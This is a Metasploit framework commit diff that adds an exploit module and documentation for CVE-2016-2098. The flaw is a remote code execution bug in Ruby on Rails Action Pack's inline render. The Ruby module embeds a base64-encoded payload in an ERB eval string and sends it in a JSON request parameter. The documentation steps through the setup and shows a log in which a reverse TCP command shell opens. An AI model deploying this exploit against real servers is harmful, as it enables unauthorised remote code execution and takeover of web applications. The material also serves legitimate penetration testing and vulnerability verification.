Land #7026, Add Action Pack render exploit CVE-2016-2098

documentation/modules/exploit/multi/http/rails_actionpack_inline_exec.md

@@ -0,0 +1,43 @@
+rails_actionpack_inine_exec is a module that exploits the render method in Action Pack.
+Applications that pass unverified user input to the ```render``` method in a controller
+or view may be vulnerable to code injection.
+
+## Vulnerable Application
+
+Action Pack versions prior to 3.2.22.2, 4.1.14.2, and 4.2.5.2 use unsafe dynamic rendering.
+
+## Verification Steps
+
+Assuming you have the right requirements to run a rails server, you can use the following fork
+to set up the vulnerable server for testing:
+
+1. Do: ```git clone https://github.com/wchen-r7/dh-CVE_2016_2098.git```
+2. Do: ```bundle install```
+3. Do: ```rails -s -b 0.0.0.0```
+4. Start msfconsole
+5. Do: ```use exploit/multi/http/rails_actionpack_inline_exec```
+6. Do: ```set RHOST [rails server IP]```
+7. Do: ```set RPORT 3000```. 3000 is the default port for the rails server.
+8. Do: ```set targeturi /exploits```
+9. Configure the rest of the options (for the modules or the payload)
+10. Do: ```exploit```, and you should get a session:
+
+```
+msf exploit(rails_actionpack_inline_exec) > run
+
+[*] Started reverse TCP handler on 192.168.146.1:4444 
+[*] Sending inline code to parameter: id
+[*] Command shell session 1 opened (192.168.146.1:4444 -> 192.168.146.161:56661) at 2016-07-07 15:56:00 -0500
+```
+
+## Options
+
+To use this module, you must manually discover the correct values for these datastore options:
+
+**TARGETURI**
+
+The path to a vulnerable Ruby on Rails application.
+
+**TARGETPARAM**
+
+The target parameter to inject with inline code.

modules/exploits/multi/http/rails_actionpack_inline_exec.rb

@@ -0,0 +1,70 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Ruby on Rails ActionPack Inline ERB Code Execution',
+      'Description'    => %q{
+          This module exploits a remote code execution vulnerability in the
+        inline request processor of the Ruby on Rails ActionPack component.
+        This vulnerability allows an attacker to process ERB to the inline
+        JSON processor, which is then rendered, permitting full RCE within
+        the runtime, without logging an error condition.
+      },
+      'Author'         =>
+        [
+          'RageLtMan <rageltman[at]sempervictus>'
+        ],
+      'License'        => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'CVE', '2016-2098' ]
+        ],
+      'Platform'       => 'ruby',
+      'Arch'           => ARCH_RUBY,
+      'Privileged'     => false,
+      'Targets'        =>	[ ['Automatic', {} ] ],
+      'DisclosureDate' => 'Mar 1 2016',
+      'DefaultOptions' => {
+        "PrependFork" => true
+      },
+      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]),
+        OptString.new('TARGETPARAM', [ true, 'The target parameter to inject with inline code', 'id'])
+      ], self.class)
+
+  end
+
+  def json_request
+    code = Rex::Text.encode_base64(payload.encoded)
+    return {
+      datastore['TARGETPARAM'] => {"inline" => "<%= eval(%[#{code}].unpack(%[m0])[0]) %>"}
+    }.to_json
+  end
+
+  def exploit
+    print_status("Sending inline code to parameter: #{datastore['TARGETPARAM']}")
+    send_request_cgi({
+      'uri'     => normalize_uri(target_uri.path),
+      'method'  => 'GET',
+      'ctype'   => 'application/json',
+      'headers' => {
+        'Accept' => 'application/json'
+      },
+      'data'    => json_request
+    }, 25)
+  end
+end